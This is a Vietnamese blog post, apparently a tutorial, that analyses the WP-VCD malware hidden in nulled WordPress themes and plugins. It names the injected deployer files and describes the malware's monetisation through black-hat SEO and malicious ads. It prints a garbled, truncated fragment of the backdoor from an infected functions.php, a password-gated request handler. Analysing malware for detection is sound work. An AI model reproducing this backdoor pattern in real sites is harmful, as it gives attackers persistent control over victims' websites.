HD phát hiện malware WP-VCD

MALWARE_infographic

Xin chào các bạn, bài viết này sẽ hướng dẫn các bạn cách phân tích phần mềm độc hại WP-VCD

  1. Phân Tích:
    Phần mềm độc hại của WP-VCD tương đối tinh vi. Nó không dựa vào mã phức tạp
    che giấu để tránh bị phát hiện như một số bệnh nhiễm trùng khác, thay vào đó chọn ẩn náu
    với tên tệp và cấu trúc mã trông hợp pháp.
    Ngoài ra, sự kết hợp giữa thiết kế linh hoạt và cơ sở hạ tầng C2 mở rộng cho phép
    những kẻ tấn công để thiết lập sự hiện diện liên tục trong các trang web của nạn nhân của họ, ngay cả khi bị nhiễm trùng
    bị loại bỏ một phần.

2. Nội dung vô hiệu được phân phối trong chiến dịch này thường chứa hai sửa đổi từ
các nguồn:
Đầu tiên, một tệp mới được thêm vào, có tên là class.plugin-modules.php hoặc
class.theme-modules.php tùy thuộc vào việc phần mềm nulled có phải là một plugin hay không
hoặc chủ đề. Tệp này là tập lệnh chính của trình triển khai chịu trách nhiệm về việc lây nhiễm trang web của nạn nhân.
Thứ hai, tệp ở trên được tham chiếu bởi chủ đề hoặc plugin bị nhiễm khi kích hoạt.
đoạn mã sau là một nội dung dòng một điển hình để kiểm tra sự hiện diện của
tập lệnh trình triển khai và thực thi nó nếu có thể:
_ FILE_)). ‘/class.theme-modules.php’)) include_once (dirname (_ FILE_). ‘/class.theme-modules.php’);?> <? php

<?phpif(isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474')){$div_code_name="wp_vcd";switch($_REQUEST['action']){case'change_domain';if(isset($_REQUEST['newdomain']))

Đoạn mã trên được lấy từ một tệp functions.php bị nhiễm trên một trang web bị xâm nhập bởi WP-VCD. Do tính phổ biến của chiến dịch, ví dụ này có thể nhận ra ngay lập tức đối với bất kỳ ai có kinh nghiệm xử lý nhiễm phần mềm độc hại.

Tại các thời điểm khác nhau trong lịch sử của nó, các tính năng cụ thể đã được thêm vào và xóa khỏi phần mềm độc hại, nhưng hầu hết các thành phần cốt lõi của WP-VCD vẫn nhất quán. Kiếm tiền đến từ hai nguồn chính: hoạt động tiếp thị lan truyền nhằm thao túng kết quả của công cụ tìm kiếm thông qua SEO mũ đen và mã quảng cáo độc hại tạo ra các chuyển hướng và quảng cáo bật lên có thể nguy hiểm cho người dùng đang xem một trang web bị xâm phạm.

Để hỗ trợ cộng đồng bảo mật trong việc ngăn ngừa, phát hiện và loại bỏ sự lây nhiễm WP-VCD, chúng tôi cũng chia sẻ một số quy tắc phát hiện phần mềm độc hại sử dụng công khai trong xác định các vị trí bị nhiễm malware. (Còn tiếp.)

Total
0
Shares
Previous Post
macbook-pro-2020

Apple iMac Pro mạnh mẽ và đa năng

Next Post
5-Tips-Anti-Fraud

5 Cách nhận diện lừa đảo Trực tuyến

Related Posts
error: